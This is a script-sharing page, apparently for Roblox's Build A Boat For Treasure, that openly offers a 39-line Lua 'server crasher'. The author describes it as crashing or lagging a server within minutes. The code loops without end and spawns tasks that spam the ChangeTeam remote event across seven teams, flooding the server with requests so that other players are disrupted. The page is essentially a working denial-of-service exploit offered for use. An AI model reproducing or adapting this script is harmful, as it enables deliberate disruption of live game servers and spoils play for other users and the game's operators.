ADVERTISEMENTREMOVE ADS
Game icon

server crasher open sourced

Script preview thumbnail
Script Preview

Description

uhh yeah you can crash a server its okay takes like 1-10 minutes
if it doesnt work too bad (it worked before, should still work)
pls credit if u use it
should be faster in smaller servers, not sure

Features:

  • babft
  • server crasher
  • server lagger
ADVERTISEMENTREMOVE ADS
39 Lines • 1.04 KiB
Verified
Raw
_G.FastMaybe = true
while task.wait() do
if _G.FastMaybe == true then
task.spawn(
function()
teams = game:GetService("Teams")
for _, team in ipairs(
{
teams.black,
teams.blue,
teams.green,
teams.magenta,
teams.red,
teams.white,
teams.yellow
}
) do
workspace.ChangeTeam:FireServer(team)
end
end
)
else
teams = game:GetService("Teams")
for _, team in ipairs(
{
teams.black,
teams.blue,
teams.green,
teams.magenta,
teams.red,
teams.white,
teams.yellow
}
) do
workspace.ChangeTeam:FireServer(team)
end
end
end
ADVERTISEMENTREMOVE ADS

Comments

0 comments
to add a comment
Loading comments
ADVERTISEMENTREMOVE ADS